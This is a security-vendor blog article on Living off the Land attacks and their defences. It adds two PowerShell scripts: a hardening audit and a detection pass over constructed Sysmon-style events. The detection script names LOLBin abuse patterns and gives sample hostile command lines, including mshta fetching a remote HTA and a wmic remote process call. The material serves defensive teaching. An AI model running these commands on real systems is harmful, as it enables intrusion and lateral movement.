Breaking In Without Malware

Living Off the Land (LotL) Attacks Explained

Living Off the Land (LotL) Attacks Explained

A look at how attackers abuse built-in system tools in living off the land (LotL) attacks to compromise systems stealthily

Living off the Land (LotL) attacks (also referred to as “fileless attacks”) have been a persistent threat in cybersecurity for over a decade. In these attacks, malicious actors leverage legitimate applications, system tools, and processes to carry out malicious activity, thereby evading traditional security measures. The term “Living off the Land” was coined around 2013, but the concept has been in practice for much longer. Over the years, the prevalence of LotL attacks has drastically increased: CrowdStrike reported in 2023 that 62% of detections involved LotL techniques. This continued into 2024, with a notable rise in cyberattacks employing LotL methods, particularly by nation-state actors targeting critical infrastructure. The increasing sophistication and frequency of these attacks underscore the importance of robust security measures and continuous monitoring to detect and mitigate these kinds of threats.

Why are LotL attacks effective?

According to the Center for Internet Security, fileless malware and LotL techniques were projected to account for 50% of total attacks against enterprise environments in 2022, matching the frequency of file-based attacks for the first time. Furthermore, ReliaQuest reported that in 2023, 86.2% of critical customer incidents involved fileless malware, with many utilizing LotL techniques by abusing legitimate Windows binaries such as Rundll32, Msiexec, and Mshta.

One of the primary reasons LotL attacks are so effective is that they rely on commonly available system binaries and scripts that administrators and users legitimately require for day-to-day operations, or that are simply present by default. By blending in with genuine processes, the attacks often go unnoticed amid regular system activity. PowerShell and Windows Management Instrumentation (WMI) are two of the most frequently abused tools: both are extremely powerful for configuration and automation, typically allowed in enterprise environments, and able to operate without producing obvious file-based artifacts. For example, malicious actors can encode PowerShell commands (Base64 being the common choice) or apply simple obfuscation to conceal a script from security tools that rely on string detection or command-line scanning. Similarly, WMI can launch processes remotely, loading malicious payloads directly into memory and leaving minimal forensic evidence on disk. Malicious actors also abuse native binaries, which are catalogued in resources such as GTFOBins (for Unix-like systems) and LOLBAS (Living Off the Land Binaries and Scripts, for Windows), where executables like mshta.exe, rundll32.exe, and regsvr32.exe are repurposed to run malicious code. Even in highly locked-down environments with application whitelisting, these binaries frequently remain trusted and permitted, making them a valuable vector for privilege escalation, lateral movement, and persistence.

A Stealthy Attack

Real-world examples illustrate just how damaging such stealthy attacks can be. In the high-profile SolarWinds attack of 2020, adversaries injected malicious code into legitimate software updates for SolarWinds Orion, effectively disguising the initial infection route. Once inside, they leveraged trusted Windows processes to escalate privileges and pivot through networks. Similarly, the FIN7 cybercrime group, known for sophisticated banking and point-of-sale intrusions, used mshta.exe to execute JavaScript payloads. By taking advantage of a benign Windows binary, the malicious actors bypassed strict security policies that would have blocked a typical malware executable. Another group, APT29 (aka Cozy Bear), demonstrated how threat actors could rely on PowerShell and WMI to issue commands on compromised machines without ever dropping a traditional piece of malware onto the disk. In each case, the overarching theme was a reliance on the tools already installed and accepted by the target environment, avoiding classic indicators of compromise and making threat hunting much more challenging for defenders.

Defensive Strategies Against LotL and Fileless Malware

Defending against LotL attacks requires a multi-pronged approach. Endpoint Detection and Response (EDR) solutions still serve as a foundation, though they must be fine-tuned to recognize suspicious patterns within legitimate processes. Modern EDR tools monitor script executions, interprocess communication, and unusual command-line arguments rather than depending on simple file-based scanning, and extend this into behavioral or heuristic analysis. Organizations can layer additional defenses, such as Sysmon logging, to spot abnormal usage of PowerShell or built-in Windows binaries like rundll32.exe. Implementing an effective logging strategy, where security teams or managed security providers proactively parse and correlate events in near-real-time, helps identify anomalies indicative of malicious behavior. The MITRE ATT&CK framework provides an excellent reference for mapping known LotL techniques (often categorized under T1218 – System Binary Proxy Execution and T1059 – Command and Scripting Interpreter) to detection rules, ensuring that defenders systematically look for red flags across different phases of an attack.

Another critical measure is application control, sometimes achieved via solutions like AppLocker or Windows Defender Application Control (WDAC). While it can be challenging to fully block tools such as PowerShell and wmic.exe, organizations can enforce stricter policies or “constrained language mode” to limit script capabilities. For example, disabling PowerShell v2, which is outdated and lacks the security improvements of later versions, can significantly reduce an attacker’s options. However, it is crucial for security teams and system administrators to maintain an informed balance. Locking down or entirely removing tools that administrators genuinely need can be disruptive and cause friction with operations teams. Therefore, a carefully curated allowlist with continuous monitoring can enhance security without crippling day-to-day workflow.
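As an added example (not part of the article), the following PowerShell script audits the controls this paragraph describes on a single host: whether the legacy PowerShell v2 engine is still installed, which language mode the current session runs in, whether script block and module logging are switched on by policy, and whether any AppLocker rules are actually in effect. Cmdlet, feature and registry names are the standard Windows ones; the function name Get-PowerShellHardeningStatus is the example's own. Run it in an elevated Windows PowerShell 5.1 session; it only reads state unless the commented remediation line at the end is uncommented.

```powershell
# Added example, not from the article: read-only audit of PowerShell hardening
# controls. Requires an elevated session (DISM and AppLocker module present).

function Get-PowerShellHardeningStatus {
    # 1. The PowerShell 2.0 engine is an optional Windows feature. While it is
    #    installed, "powershell -Version 2" sidesteps the logging and language
    #    restrictions of the newer engine.
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
    [pscustomobject]@{
        Control = 'PowerShell v2 engine disabled'
        Value   = $v2.State
        Pass    = ($v2.State -eq 'Disabled')
    }

    # 2. Constrained Language Mode is enforced by a WDAC or AppLocker policy;
    #    the session merely reports which mode it ended up in.
    $mode = $ExecutionContext.SessionState.LanguageMode
    [pscustomobject]@{
        Control = 'Constrained Language Mode'
        Value   = $mode
        Pass    = ($mode -eq 'ConstrainedLanguage')
    }

    # 3. Script block and module logging (Group Policy registry keys) record the
    #    de-obfuscated content of scripts that actually ran, which is what the
    #    Sysmon/SIEM pipeline needs to see through encoded or obfuscated commands.
    $logPolicies = @(
        @{ Name = 'Script block logging'
           Key  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
           Val  = 'EnableScriptBlockLogging' },
        @{ Name = 'Module logging'
           Key  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
           Val  = 'EnableModuleLogging' }
    )
    foreach ($p in $logPolicies) {
        $setting = Get-ItemProperty -Path $p.Key -Name $p.Val -ErrorAction SilentlyContinue
        $enabled = ($null -ne $setting) -and ($setting.($p.Val) -eq 1)
        [pscustomobject]@{
            Control = $p.Name
            Value   = $(if ($enabled) { 1 } else { 'not set' })
            Pass    = $enabled
        }
    }

    # 4. An AppLocker policy with empty rule collections enforces nothing, so
    #    count the rules in the effective policy rather than checking for its presence.
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    $ruleCount = [int](($policy.AppLockerPolicy.RuleCollection |
        ForEach-Object { $_.ChildNodes.Count } | Measure-Object -Sum).Sum)
    [pscustomobject]@{
        Control = 'AppLocker rules in effect'
        Value   = $ruleCount
        Pass    = ($ruleCount -gt 0)
    }
}

Get-PowerShellHardeningStatus | Format-Table -AutoSize

# Remediation for control 1 (takes full effect after a reboot); uncomment to apply:
# Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart
```

Each control comes back as an object with a Pass flag, so the output can be exported or fed into a configuration-baseline check rather than read by eye. The AppLocker count is deliberately crude: it tells you whether any rules exist, not whether they cover the binaries the article lists, which still has to be checked against the policy itself.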

Even with these measures in place, threat actors skilled in evasion techniques can still find cracks to exploit. Strict network segmentation, regular patching, and the principle of least privilege help reduce the blast radius when an attacker does succeed in abusing built-in tools. Compartmentalizing access to administrative utilities on a need-to-use basis can prevent threat actors from having free rein across the environment once they have compromised an initial endpoint. Likewise, logging suspicious command lines or high-risk processes in security information and event management (SIEM) platforms ensures that unusual spikes in usage, like an end-user suddenly running wmic.exe for remote process calls, stand out in routine security reviews or automated alerts.
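As an added example (not part of the article) of the detection logic the previous two paragraphs call for, the script below runs a few rules over constructed process-creation records shaped like Sysmon Event ID 1 (user, image, command line) and tags each hit with the MITRE ATT&CK technique it maps to: encoded PowerShell under T1059.001, rundll32, mshta and regsvr32 proxy execution under the T1218 sub-techniques, and remote process creation through wmic.exe under T1047. The sample events, account and host names, and the function name Get-LotLFindings are all constructed for the example; the rules are intentionally simple and would be tuned against a real environment's baseline before use.

```powershell
# Added example, not from the article: detection pass over constructed
# Sysmon-style process-creation records. Nothing here reads a live event log.

function Get-LotLFindings {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        $cmd   = $e.CommandLine
        $image = [IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        $hits  = @()

        # T1059.001 - encoded PowerShell. Decode the Base64/UTF-16LE payload so the
        # alert shows the real command instead of an opaque blob.
        if (($image -in @('powershell.exe', 'pwsh.exe')) -and
            ($cmd -match '-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})')) {
            $decoded = '<undecodable>'
            try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) } catch { }
            $hits += "T1059.001 encoded PowerShell -> $decoded"
        }

        # T1218 - signed binary proxy execution: the binaries the article names,
        # invoked with arguments they rarely carry in normal administrative use.
        if (($image -eq 'rundll32.exe') -and ($cmd -match '\\Users\\|\\Temp\\|\\ProgramData\\|javascript:|https?://')) {
            $hits += 'T1218.011 rundll32 loading from a user-writable path or URL'
        }
        if (($image -eq 'mshta.exe') -and ($cmd -match 'https?://|javascript:|vbscript:')) {
            $hits += 'T1218.005 mshta executing remote or inline script'
        }
        if (($image -eq 'regsvr32.exe') -and ($cmd -match '/i:.*https?://|scrobj\.dll')) {
            $hits += 'T1218.010 regsvr32 with scriptlet or remote argument'
        }

        # T1047 - WMI used to create a process on another host.
        if (($image -eq 'wmic.exe') -and ($cmd -match '/node:') -and ($cmd -match 'process\s+call\s+create')) {
            $hits += 'T1047 wmic remote process call create'
        }

        foreach ($h in $hits) {
            [pscustomobject]@{ User = $e.User; Image = $image; Finding = $h; CommandLine = $cmd }
        }
    }
}

# Constructed sample events: two benign administrative actions and four that the
# rules should flag. The encoded command decodes to the harmless 'Write-Host hi'.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Write-Host hi'))
$sample = @(
    [pscustomobject]@{ User = 'CORP\svc-backup'; Image = 'C:\Windows\System32\rundll32.exe'
                       CommandLine = 'rundll32.exe shell32.dll,Control_RunDLL' },
    [pscustomobject]@{ User = 'CORP\admin1'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -File C:\Scripts\backup.ps1' },
    [pscustomobject]@{ User = 'CORP\jdoe'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = "powershell.exe -NoProfile -EncodedCommand $encoded" },
    [pscustomobject]@{ User = 'CORP\jdoe'; Image = 'C:\Windows\System32\rundll32.exe'
                       CommandLine = 'rundll32.exe C:\Users\jdoe\AppData\Local\Temp\update.dll,DllMain' },
    [pscustomobject]@{ User = 'CORP\jdoe'; Image = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta.exe https://example.invalid/page.hta' },
    [pscustomobject]@{ User = 'CORP\jdoe'; Image = 'C:\Windows\System32\wbem\WMIC.exe'
                       CommandLine = 'wmic.exe /node:FS01 process call create "cmd.exe /c whoami"' }
)

Get-LotLFindings -Events $sample | Format-Table -AutoSize -Wrap
```

Running it prints four findings, one per suspicious event, and nothing for the two benign records. The point of the decode step is the one the article makes about encoded commands: a rule that only matches on the string "-EncodedCommand" tells the analyst that something was hidden, while decoding it tells them what. To run the same rules against real data, pull events with Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }, map the User, Image and CommandLine fields of each event into objects of the same shape, and pass them to the function; the user-and-host context is what makes a wmic.exe remote call from an ordinary end-user account stand out in a SIEM review.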

Professional, manual (not AI-driven or automated) penetration testing and red teaming services can be instrumental in discovering gaps and fine-tuning defenses against LotL methods. Through real-world adversary simulation, expert red teams replicate the same tactics used by threat actors, identifying potential weaknesses in an organization’s defenses. For instance, Redbot Security (https://redbotsecurity.com), a firm specializing in manual penetration testing and red teaming, often examines how effectively an organization’s monitoring and restrictions respond to PowerShell-based attacks or LoLBin abuse. By emulating these techniques in a controlled environment, clients gain visibility into their detection and response capabilities before a real adversary tests them. This kind of proactive assessment is invaluable given the tricky nature of attacks that rely on legitimate processes, where advanced behavioral analytics and well-tuned rulesets are the primary means of detection.

Conclusion

Ultimately, LotL attack techniques are a constant game of cat and mouse between defenders and adversaries. As traditional malware detection becomes more effective, threat actors pivot to less conspicuous tactics to slip under the radar. Their success depends on blending into normal operations by hijacking tools with legitimate, day-to-day utility. EDR solutions, PowerShell security enhancements, restricted permissions, and robust logging will remain at the heart of any effective defense. However, it is equally critical that organizations regularly update their detection signatures and heuristics to keep pace with the latest attacker tradecraft. The growing catalog of GTFOBins and LOLBAS techniques should serve as a living checklist for defenders, reminding them that every system utility, from archiving commands like tar to .NET binaries capable of loading custom DLLs, might provide a foothold for a skilled adversary. Although no single security measure can completely thwart every fileless attack, a coordinated defensive strategy that layers detection, containment, and active threat hunting across all endpoints can dramatically reduce the likelihood of a successful breach. By staying vigilant, adopting best practices from frameworks like MITRE ATT&CK, and partnering with specialized penetration testing companies to test defenses, organizations can substantially mitigate the risk posed by this evolving and persistent threat.

About the Author

Morgan Habecker

Morgan Habecker is a results-driven cybersecurity executive and current COO at Redbot Security with a solid background in penetration testing and IT leadership. He has effectively managed cross-functional teams and refined security operations, leveraging hands-on vulnerability assessments alongside strategic oversight to enhance organizational defenses. His blend of technical expertise and leadership acumen has consistently delivered improved security postures and operational excellence throughout his career.

https://www.linkedin.com/in/morganhabecker/

© Copyright 2016-2025 Redbot Security